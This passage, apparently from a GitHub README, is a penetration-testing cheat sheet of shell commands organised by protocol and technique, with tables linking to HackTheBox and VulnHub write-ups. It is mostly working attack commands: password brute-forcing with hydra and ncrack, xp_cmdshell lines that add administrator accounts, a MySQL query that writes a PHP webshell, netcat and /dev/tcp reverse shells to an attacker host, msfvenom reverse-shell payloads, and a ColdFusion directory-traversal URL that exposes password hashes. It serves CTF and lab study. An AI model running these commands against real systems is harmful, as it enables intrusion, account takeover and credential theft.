"http,https,ssl,soap,http-proxy,http-alt" ## create wordlist by crawling webpage curl -i <targetip> ## check http response headers gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/cgis.txt -u http://<targetip>:<targetport> -s "200,204,301,307,403,500" gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/cgis.txt -u https://<targetip>:<targetport> -s "200,204,301,307,403,500" gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/common.txt -u http://<targetip>:<targetport> -s "200,204,301,307,403,500" gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/common.txt -u http://<targetip>:<targetport> -s "200,204,301,307,403,500" gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/common.txt -u https://<targetip>:<targetport> -s "200,204,301,307,403,500" gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://<taregtip>/ -t 20 -U <username> -P <password> hydra -l <username> -P /usr/share/wordlists/rockyou.txt <targetip> http-get / hydra -l <username> -P /usr/share/wordlists/rockyou.txt <targetip> http-head / nc -v -n -w1 <targetip> <targetport> ## netcat to grab banner nikto -o "[OUTPUT].txt" -p <targetport> -h <targetip> nmap -Pn -sV -sC -vvvvv -p<targetport> <targetip> -oA [OUTPUT] w3m -dump <targetip>/robots.txt wafw00f http://<targetip>:<targetport>, "http,https,ssl,soap,http-proxy,http-alt" ## check if server is behind a web app firewall wafw00f https://<targetip>:<targetport>, "http,https,ssl,soap,http-proxy,http-alt" ## check if server is behind a web app firewall whatweb <targetip>:<targetport> --color=never --log-brief="[OUTPUT].txt" ## identify web technology ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [InfoSec Prep: OSCP](https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/writeup.pdf) | [vh#508](https://www.vulnhub.com/entry/infosec-prep-oscp,508/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_ssh_privatekeys`](https://github.com/7h3rAm/writeups#exploit_ssh_privatekeys), [`privesc_lxc_bash`](https://github.com/7h3rAm/writeups#privesc_lxc_bash) | | 2. | [Year of the Fox](https://github.com/7h3rAm/writeups/blob/master/thm.yotf/writeup.pdf) | [tryhackme#yotf](https://tryhackme.com/room/yotf) | <img src="https://github.com/7h3rAm/writeups/blob/master/thm.yotf/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_command_injection`](https://github.com/7h3rAm/writeups#exploit_command_injection), [`privesc_env_relative_path`](https://github.com/7h3rAm/writeups#privesc_env_relative_path) | | 3. | [Buff](https://github.com/7h3rAm/writeups/blob/master/htb.buff/writeup.pdf) | [htb#263](https://www.hackthebox.eu/home/machines/profile/263) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_gymsystem_rce`](https://github.com/7h3rAm/writeups#exploit_gymsystem_rce), [`exploit_cloudme_bof`](https://github.com/7h3rAm/writeups#exploit_cloudme_bof) | | 4. | [Bashed](https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf) | [htb#118](https://www.hackthebox.eu/home/machines/profile/118) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs) | | 5. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="enumerate_proto_ldap"></a> #### enumerate_proto_ldap [⇡](#enumerate) ```shell ldapsearch -x -s base -h <targetip> -p 389 ``` --- <a name="enumerate_proto_mssql"></a> #### enumerate_proto_mssql [⇡](#enumerate) ```shell hydra -s <targetport> -C /usr/share/sparta/wordlists/mssql-default-userpass.txt -u -f <targetip> mssql hydra -ufl /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt mssql://<targetip> nmap --script=ms-sql-* --script-args mssql.instance-port=1433 <targetip> nmap -Pn -n -sS --script=ms-sql-xp-cmdshell.nse <targetip> -p1433 --script-args mssql.username=sa,mssql.password=<sql_password>,ms-sql-xp-cmdshell.cmd="net user anderson cooper /add" nmap -Pn -n -sS --script=ms-sql-xp-cmdshell.nse <targetip> -p1433 --script-args mssql.username=<sql_user>,mssql.password=<sql_password>,ms-sql-xp-cmdshell.cmd="net localgroup administrators anderson /add" nmap -vv -sV -Pn -p <targetport> --script=ms-sql-info,ms-sql-config,ms-sql-dump-hashes --script-args=mssql.instance-port=%s,smsql.username-sa,mssql.password-sa <targetip> ``` --- <a name="enumerate_proto_mysql"></a> #### enumerate_proto_mysql [⇡](#enumerate) ```shell nmap --script=mysql-* <targetip> bruteforce: hydra -ufl /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt mysql://<targetip> nmap -p 3306 --script mysql-brute --script-args userdb=/usr/share/wordlists/mysql_users.txt,passdb=/usr/share/wordists/rockyou.txt -vv <targetip> create a reverse shell: select '<?php exec($_GET["cmd"]); ?>' from store into dumpfile '/var/www/https/blogblog/wp-content/uploads/shell.php' udf: if mysql is running as root AND /usr/lib/lib_mysqludf_sys.so file is present, we can privesc nmap -sV -Pn -vv -script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <targetip> -p <targetport> hydra -s <targetport> -C ./wordlists/mysql-default-userpass.txt -u -f <targetip> mysql ``` --- <a name="enumerate_proto_nfs"></a> #### enumerate_proto_nfs [⇡](#enumerate) ```shell nmap -sV --script=nfs-* <targetip> showmount -e <targetip> ``` --- <a name="enumerate_proto_oracle"></a> #### enumerate_proto_oracle [⇡](#enumerate) ```shell msfcli auxiliary/scanner/oracle/tnslsnr_version rhosts=<targetip> E msfcli auxiliary/scanner/oracle/sid_enum rhosts=<targetip> E tnscmd10g status -h <targetip> hydra -uf -P /usr/share/wordlists/metasploit/unix_passwords.txt <targetip> -s 1521 oracle-listener ``` --- <a name="enumerate_proto_postgres"></a> #### enumerate_proto_postgres [⇡](#enumerate) ```shell hydra -s <targetport> -C /usr/share/sparta/wordlists/postgres-default-userpass.txt -u -f <targetip> postgres hydra -ufl /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt <targetip> -s 1521 postgres ``` --- <a name="enumerate_proto_rdp"></a> #### enumerate_proto_rdp [⇡](#enumerate) ```shell perl /usr/share/sparta/scripts/rdp-sec-check.pl <targetip>:<targetport> ncrack -vv --user administrator -P /usr/share/wordlists/rockyou.txt rdp://<targetip> ``` --- <a name="enumerate_proto_rpc"></a> #### enumerate_proto_rpc [⇡](#enumerate) ```shell rpcinfo -p <targetip> ``` --- <a name="enumerate_proto_smb"></a> #### enumerate_proto_smb [⇡](#enumerate) ```shell locate all smb scripts on kali and run them to gather details: locate *.nse | grep smb try enum4linux to get open shares, permissions and local users: enum4linux -a <targetip> nbtscan -vhr <targetip> scans: nmap -p139,445 --script smb-vuln-* --script-args=unsafe=1 <targetip> nmap -p139,445 --script smb-enum-* --script-args=unsafe=1 <targetip> null sessions: bash -c "echo 'srvinfo' | rpcclient -U % <targetip>" groups: nmap -vv -p139,445 --script=smb-enum-groups <targetip> users: bash -c "echo 'enumdomusers' | rpcclient -U % <targetip>" admins: net rpc group members "Domain Admins" -U % -I <targetip> shares: nmap -vv -p139,445 --script=smb-enum-shares <targetip> sessions: nmap -vv -p139,445 --script=smb-enum-sessions <targetip> policies: nmap -vv -p139,445 --script=smb-enum-domains <targetip> version: use auxiliary/scanner/smb/smb_version bruteforce: use auxiliary/scanner/smb/smb_login bash -c "echo 'enumdomusers' | rpcclient <targetip> -U%" bash -c "echo 'srvinfo' | rpcclient <targetip> -U%" bash /usr/share/sparta/scripts/smbenum.sh <targetip> enum4linux <targetip> nbtscan -v -h <targetip> net rpc group members "Domain Admins" -I <targetip> -U% nmap -p<targetport> --script=smb-enum-domains <targetip> -vvvvv nmap -p<targetport> --script=smb-enum-groups <targetip> -vvvvv nmap -p<targetport> --script=smb-enum-sessions <targetip> -vvvvv nmap -p<targetport> --script=smb-enum-shares <targetip> -vvvvv nmap -sV -Pn -vv -p <targetport> --script=smb-vuln* --script-args=unsafe=1 <targetip> python /usr/share/doc/python-impacket-doc/examples/samrdump.py <targetip> <targetport>/SMB smbclient -L <targetip> smbclient //<targetip>/admin$ -U john smbclient //<targetip>/ipc$ -U john smbclient //<targetip>/tmp smbclient \\<targetip>\ipc$ -U john winexe -U username //<targetip> "cmd.exe" --system ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#archetype](https://www.hackthebox.eu/home/start) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="enumerate_proto_smb_anonymous_access"></a> #### enumerate_proto_smb_anonymous_access [⇡](#enumerate) open shares, anonymous logins ```shell # connect to and explore smb share: smbclient -N -L \\\\<targetip> smbclient -N \\\\<targetip>\\$share # look for null sessions "allows sessions using username '', password ''", use smbclient to connect and explore smb share: enum4linux -a <targetip> smbclient -U "" //<targetip>/share$ (password: "") smbclient //<targetip>/share$ -U lazysysadmin -p 445 ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#archetype](https://www.hackthebox.eu/home/start) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="enumerate_proto_smtp"></a> #### enumerate_proto_smtp [⇡](#enumerate) ```shell smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t <targetip> -p <targetport> smtp-user-enum -M EXPN -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t <targetip> -p <targetport> smtp-user-enum -M RCPT -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t <targetip> -p <targetport> # send email: swaks --to eric@madisonhotels.com --from vvaughn@polyfector.edu --server 192.168.92.167:2525 --body "My kid will be a soccer player" --header "Subject: My kid will be a soccer player" ``` --- <a name="enumerate_proto_snmp"></a> #### enumerate_proto_snmp [⇡](#enumerate) ```shell snmpcheck -t <targetip> nmap -sU -p 161 --script=*snmp* <targetip> xprobe2 -v -p udp:161:open <targetip> use auxiliary/scanner/snmp/snmp_login use auxiliary/scanner/snmp/snmp_enum enumerate open ports, running services and applications: snmpwalk -v2c -c public <targetip> . snmp-check -t 5 -c public <targetip> scan using multiple community strings: echo public >community echo private >>community echo manager >>community for ip in $(seq 200 254); do echo 10.11.1.${ip}; done >ips onesixtyone -c community -i ips onesixtyone -c /usr/share/wordlists/dirb/small.txt <targetip> enumerate windows users: snmpwalk -c public -v1 <IP> 1.3.6.1.4.1.77.1.2.25 for i in $(cat /usr/share/wordlists/metasploit/unix_users.txt); do snmpwalk -v 1 -c $i 192.168.1.200; done | grep -e "Timeout" enumerate current windows processes: snmpwalk -c public -v1 <IP> 1.3.6.1.2.1.25.4.2.1.2 enumerate windows open tcp ports: snmpwalk -c public -v1 <IP> 1.3.6.1.2.1.6.13.1.3 enumerate installed software: snmpwalk -c public -v1 <IP> 1.3.6.1.2.1.25.6.3.1.2 ``` --- <a name="enumerate_proto_sql"></a> #### enumerate_proto_sql [⇡](#enumerate) ```shell locate all sql scripts on kali and run them to gather details: locate *.nse | grep sql ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#archetype](https://www.hackthebox.eu/home/start) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="enumerate_proto_sql_ssis_dtsconfig"></a> #### enumerate_proto_sql_ssis_dtsconfig [⇡](#enumerate) The `.dtsConfig` files are used by [SQL Server Integration Services (SSIS)](https://en.wikipedia.org/wiki/SQL_Server_Integration_Services) and can contain plaintext credentials for SQL users. ```shell cat *.dtsConfig ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#archetype](https://www.hackthebox.eu/home/start) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="enumerate_proto_ssh"></a> #### enumerate_proto_ssh [⇡](#enumerate) ```shell authorized_keys: ssh-keygen -t rsa -b 2048 enter a custom filename copy contents of <filename>.pub to /home/<username>/.ssh/authorized_keys ssh -i <filename>.pub <username>@<targetip> ssh enum: msf > use auxiliary/scanner/ssh/ssh_enumusers msf auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 10.11.1.0/24 msf auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt msf auxiliary(scanner/ssh/ssh_enumusers) > set THREADS 254 msf auxiliary(scanner/ssh/ssh_enumusers) > run ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="enumerate_proto_telnet"></a> #### enumerate_proto_telnet [⇡](#enumerate) ```shell nmap -p 23 --script telnet-brute --script-args userdb=/usr/share/metasploit-framework/data/wordlists/unix_users,passdb=/usr/share/wordlists/rockyou.txt,telnet-brute.timeout=20s <targetip> use auxiliary/scanner/telnet/telnet_version msf auxiliary(telnet_version) > set RHOSTS 10.11.1.0/24 msf auxiliary(telnet_version) > set THREADS 254 msf auxiliary(telnet_version) > run use auxiliary/scanner/telnet/telnet_login msf auxiliary(telnet_login) > set BLANK_PASSWORDS false msf auxiliary(telnet_login) > set PASS_FILE passwords.txt msf auxiliary(telnet_login) > set RHOSTS 10.11.1.0/24 msf auxiliary(telnet_login) > set THREADS 254 msf auxiliary(telnet_login) > set USER_FILE users.txt msf auxiliary(telnet_login) > set VERBOSE false msf auxiliary(telnet_login) > run ``` --- <a name="enumerate_proto_webdav"></a> #### enumerate_proto_webdav [⇡](#enumerate) ```shell default pass for xampp: wampp/xampp test uploading different file extensions: davtest -url http://10.11.1.10 test uploading different file extensions, with given creds: davtest -url http://10.11.1.10 -auth username:password remove files uploaded during test: davtest -cleanup create a reverse shell (asp file even if not allowed) connect to webdav share, bypass upload restrictions: cadaver http://10.11.1.10 mkdir temp cd temp put revshell.asp revshell.txt copy revshell.txt revshell.asp open nc to catch reverse shell connection browse webdav share and open uploaded file ``` --- <a name="exploit"></a> ### ⚙️ Exploit [🡑](#ttps) <a name="exploit_apache_tomcat"></a> #### exploit_apache_tomcat [⇡](#exploit) leverage Tomcat Web Application Manager to deploy a malicious .war file that spawns a reverse shell ```shell msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> -f war >backdoor.war # deploy war file through tomcat manager # start netcat listener and visit the link for uploaded jsp file to trigger webshell jar -xvf backdoor.war http://<targetip>:<targetport>/<.war filename w/o extension>/<.jsp filename in war archive w/ extension> ``` [+] https://0xrick.github.io/hack-the-box/jerry/ --- <a name="exploit_bash_reverseshell"></a> #### exploit_bash_reverseshell [⇡](#exploit) spawn a bash reverse shell to gain interactive access on the target system ```shell nc -nlvp <attackerport> rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <attackerip> <attackerport> >/tmp/f ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Misdirection: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf) | [vh#371](https://www.vulnhub.com/entry/misdirection-1,371/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png" width="100" height="100" /> | [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable) | [+] http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet [+] https://highon.coffee/blog/reverse-shell-cheat-sheet/#bash-reverse-shells --- <a name="exploit_bof"></a> #### exploit_bof [⇡](#exploit) create a bof exploit to execute arbitrary code and gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Brainpan: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/writeup.pdf) | [vh#51](https://www.vulnhub.com/entry/brainpan-1,51/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/killchain.png" width="100" height="100" /> | [`exploit_bof`](https://github.com/7h3rAm/writeups#exploit_bof), [`privesc_anansi`](https://github.com/7h3rAm/writeups#privesc_anansi), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | --- <a name="exploit_cloudme_bof"></a> #### exploit_cloudme_bof [⇡](#exploit) the CloudMe version 1.11.12 is vulnerable to a buffer overflow that could be used to gain interactive access on the target system, possibly with elevated privileges ```shell msfvenom -p windows/shell_reverse_tcp lhost=<attackerip> lport=<attackerport> -b "\x00\x0a\x0d" -f python -a x86 --platform windows -e x86/shikata_ga_nai sudo nc -nlvp <attackerport> python 48389.py ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Buff](https://github.com/7h3rAm/writeups/blob/master/htb.buff/writeup.pdf) | [htb#263](https://www.hackthebox.eu/home/machines/profile/263) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_gymsystem_rce`](https://github.com/7h3rAm/writeups#exploit_gymsystem_rce), [`exploit_cloudme_bof`](https://github.com/7h3rAm/writeups#exploit_cloudme_bof) | [+] https://www.exploit-db.com/exploits/48389 --- <a name="exploit_cmdexec"></a> #### exploit_cmdexec [⇡](#exploit) execute arbitrary commands via a command execution vulnerability and gain interactive access on the target system ```shell nc -nlvp <attackerport> bash -i >& /dev/tcp/<attackerip>/<attackerport> 0>&1 ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: Level 1.1 (#2)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/writeup.pdf) | [vh#23](https://www.vulnhub.com/entry/kioptrix-level-11-2,23/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_cmdexec`](https://github.com/7h3rAm/writeups#exploit_cmdexec), [`privesc_kernel_ipappend`](https://github.com/7h3rAm/writeups#privesc_kernel_ipappend) | --- <a name="exploit_coldfusion_dirtraversal"></a> #### exploit_coldfusion_dirtraversal [⇡](#exploit) coldfusion 8 is vulnerable to a directory traversal and exposes SHA1 hash of the user password ```shell http://<targetip>:<targetport>/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en ``` [+] https://medium.com/@_C_3PJoe/htb-retired-box-write-up-arctic-50eccccc560 [+] https://www.exploit-db.com/exploits/14641 --- <a name="exploit_coldfusion_scheduledtasks"></a> #### exploit_coldfusion_scheduledtasks [⇡](#exploit) coldfusion 8 allows to obtain remote shell by creating and executing a new scheduled task. this is a post-authentication vulnerability ```shell http://<targetip>:<targetport>/CFIDE/administrator/enter.cfm http://<targetip>:<targetport>/CFIDE/administrator/settings/mappings.cfm # check the CFIDE logical path mapping to identify the file upload location, C:\ColdFusion8\wwwroot\CFIDE msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> -f raw >revshell.jsp nc -nlvp <attackerport> http://<targetip>:<targetport>/CFIDE/administrator/scheduler/scheduletasks.cfm # set url to revshell.jsp link # mark the save output to file option # set file to C:\ColdFusion8\wwwroot\CFIDE\revshell.jsp # run the scheduled task on demand to upload the revshell.jsp file http://<targetip>:<targetport>/CFIDE/revshell.jsp ``` [+] https://medium.com/@_C_3PJoe/htb-retired-box-write-up-arctic-50eccccc560 --- <a name="exploit_command_injection"></a> #### exploit_command_injection [⇡](#exploit) certain webapps couldbe vulebrable to command injection via input text fields ```shell # submit escaped input: "\";whoami\n" ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Year of the Fox](https://github.com/7h3rAm/writeups/blob/master/thm.yotf/writeup.pdf) | [tryhackme#yotf](https://tryhackme.com/room/yotf) | <img src="https://github.com/7h3rAm/writeups/blob/master/thm.yotf/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_command_injection`](https://github.com/7h3rAm/writeups#exploit_command_injection), [`privesc_env_relative_path`](https://github.com/7h3rAm/writeups#privesc_env_relative_path) | [+] https://muirlandoracle.co.uk/2020/05/30/year-of-the-fox-write-up/ --- <a name="exploit_credsreuse"></a> #### exploit_credsreuse [⇡](#exploit) Reuse credentials already found for a service to interact with another service | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Blocky](https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf) | [htb#48](https://www.hackthebox.eu/home/machines/profile/48) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 2. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 3. | [Node: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf) | [vh#252](https://www.vulnhub.com/entry/node-1,252/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png" width="100" height="100" /> | [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 4. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), 